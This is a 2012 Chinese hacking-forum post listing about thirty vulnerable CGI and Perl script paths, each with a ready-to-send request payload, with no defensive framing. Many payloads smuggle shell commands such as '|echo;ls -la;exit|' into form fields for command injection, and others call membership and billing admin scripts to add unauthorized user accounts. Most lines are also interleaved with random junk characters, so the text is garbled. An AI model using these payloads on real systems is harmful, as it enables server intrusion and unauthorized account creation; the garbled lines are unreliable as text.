找回密码
 立即注册
查看: 2989|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================! l  Y$ g$ k* B3 L
$ f$ I0 O7 [; v( G2 f" ^; j
/smspass.pl4 L- _1 A; o- X! V6 n  Y
username=username&password=password- }  W# @0 y, k
( t; L: L. v6 W& u3 N( ~  F
/index.cgi8 h+ a; M: ]% @8 P6 j: I: [
wei=ren&gen=command
" o1 l& {: m3 U- {) R  b8 o6 V$ f. }+ ?
/passmaster.cgi
: D& y' a6 E1 T" s! W' ^Action=Add&Username=Username&Password=Password
9 e9 J6 W8 R" S
& u, B4 Y* M: f* W$ t/accountcreate.cgi
7 G" H; m  G% K# x5 ~username=username&password=password&ref1=|echo;ls|9 u  M/ a) J. m  y$ b, I
& A3 [/ c7 c8 A* v9 }3 |# Y1 B
/form.cgi
8 m! O( I0 z5 ~9 l; e4 ename=xxxx&email=email&subject=xxxx&response=|echo;ls|
. h  E4 i& `" O
0 i, j6 Y8 M' U6 \* Z/addusr.pl
. a5 i4 R: t/ c; I. D/cgi-bin/EuroDebit/addusr.pl8 X- M( O3 v( \  r9 w
user=username&pass=Password&confirm=Password
  ]. Z9 p4 O  L0 P. c( a) K8 E) m1 D. `8 @
/ccbill-local.asp! p1 E+ |2 a3 q( p: Y
post_values=username:password: ~; w) L$ b1 C# g$ ^

( m0 `7 q/ m0 x1 l- x- \  X9 L/count.cgi" x3 P7 c% V$ }# O
pinfile=|echo;ls -la;exit|# E- e7 c( Q0 P) W! i, T
* H& F2 b- \/ M+ Z: x& P5 g
/recon.cgi
* }3 c, Y6 x) Y- @3 Y8 `/recon.cgi?search
# \2 N) Q6 ?& W3 e/ a7 ssearchoption=1&searchfor=|echo;ls -al;exit|9 ]: Q4 L7 \6 e2 r4 V" T5 ^+ T
2 ~# q! f# d5 }: G0 u  c5 x/ \
/verotelrum.pl$ g5 F6 ^. U! W
vercode=username:password:dseegsow:add:amount<&30>! @% s6 A6 N  A* v3 F) p

$ q  G3 U  p$ K5 J/af.cgi1 Q- r. `+ ^9 S; Z) A0 C
_browser_out=|echo;ls -la;exit;|
7 F3 K1 L5 r/ N6 F: r
  {$ E* E/ _$ H5 I* ~3 T/modify.cgi4 {1 S" m$ g% f8 l/ s) A
username=username&password=password&expire=30. w+ e5 D2 |5 |8 w% t3 d

+ b  r) v0 }# D8 `: @/openjournal.cgi
4 F& K) K/ g# d7 z3 f" \# S+ O4 [$ A0 gedit=1&ct=2&go=|echo;ls -al;exit|$ S3 t$ R' n# B
* F5 [& \# v  Q* l' d/ N' `& J
/gx9passwd.cgi
5 z0 y, s+ k1 t# H6 T2 wcmd=ADD&user=username&pass=password. O6 j, b" h  ~. o3 V8 l2 Y
1 C+ ]/ V5 ?& x$ ~' ?
/probecontrol.cgi
/ o; v5 `1 T$ |2 Y1 ?1 ^command=enable&username=username&password=password- p) P; u( l2 ]1 e2 m! G
7 K6 U$ @! d  f
/recon.cgi4 ^4 `9 R1 B' ^) K0 Z; A: S+ v4 v+ N
searchoption=3&searchfor=echo;ls -la;exit
$ m, ~0 Q  d4 Z- X0 d/ i  ^3 l. p3 B7 ]0 Q7 T$ J
/htadd.pl! b5 v+ `+ X  O2 s6 e
configfile=|echo; ls -alt; exit
) k: K9 T; U( g1 @* z% Z
, ]0 ?0 O- H' l4 @' S/ e/gx9passwd.cgi
# c# j# G7 Q# a/ o+ _. Acmd=ADD&user=username&pass=password
  m% ^0 U: j- g# W9 w, m; F1 T' G8 _) |% K! _8 y. N8 J& g
/ibill*.pl: [/ a% }! i3 L: T5 H
reqtype=add&authpwd=authpwd&username=username&password=password: ^8 o7 |0 l0 p) i" t6 ]
3 z2 _9 N6 Y0 k* m) Q- w. t
/cpay.cgi- N0 v8 |! s' k1 n4 |) h. g
command=add_member&username=username(EMAIL)&password=password(DES): ^: `( B# T# d) S7 ]8 Y
5 T7 }+ }+ o- D! c% W" c
/globill_ut.cgi
& a+ }  j* z# L1 Z# zdo=add&username=username&password=password&wpassword=password
% Z3 }1 a5 C, Y1 h: @* u5 T) n6 N! _! n, W- B  V, q- E
/usercontrol.cgi$ y, M, B9 a9 f! w$ M! i
command=enable&username=USER&password=PASS2 u  W. {0 g2 m+ j
- r/ R8 w: ^( }2 F0 f
/globoSALErum.cgi
* ^* ^0 G1 M) _0 F+ Caction=ADD&seccode=seccode&login=username&password=password. J  p1 c: ]& {0 O% @

# `/ \# b: h8 Y, X" m# z/addusr.pl
, X, G6 J8 P4 S7 p  G( vuser=USER&pass=PASS&confirm=PASS' k* I$ v( D  X1 `1 P/ U2 r

6 a2 S" [( g4 [; V/pincount.cgi
" @. J! {8 Q* L5 K" H* d1 T! B8 K/cgi-bin/mastergate/pincount.cgi* k# `6 B2 N; d* m
pinfile=|echo;pwd;exit|# W; w6 j) A& ]
* z  V# ^, k3 g0 q
/accountcreate.cgi, z! ?, F9 l; g: e! c
/cgi-bin/gateway/accountcreate.cgi
# R) W( }: |/ |& _username=username&password=password&password2=password&ref1=|echo;ls -al;exit
+ i. c& h2 L% O& p4 p# O+ F3 W) K7 h
/ ?* ^# r# S+ |$ I" ~/af.cgi
0 s. e: `( ]  I) g5 [: Q4 R/env.cgi* K4 U2 V+ S3 }; I
ADD+;echo;pwd;exit
; V4 ]- \' Y/ [  G: n4 S
) Y2 o) Q6 D/ O/ \, L7 t/count.cgi4 X' W& ^- K! Y/ _! n: P9 u; d
pinfile=|echo;pwd;exit|
! k) u9 p) ^9 i* N( q+ h1 u6 g6 o
/recon.cgi9 [( L* u& @9 d: S, M
searchoption=1&searchfor=|echo;ls%20-al;exit|! g: Z2 h7 h. x3 N% I- R
+ C: a: c7 A4 Z7 @9 a& R7 @  d( [
/add.cgi
* ]& x4 c! [$ ]* O0 Musername=username&password=password&expire=30
; W+ V+ w! C/ H+ a4 m& h( Q
2 Q9 @6 z2 e8 a: H1 T/ K; q==============================( x  p* i* n) `# A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表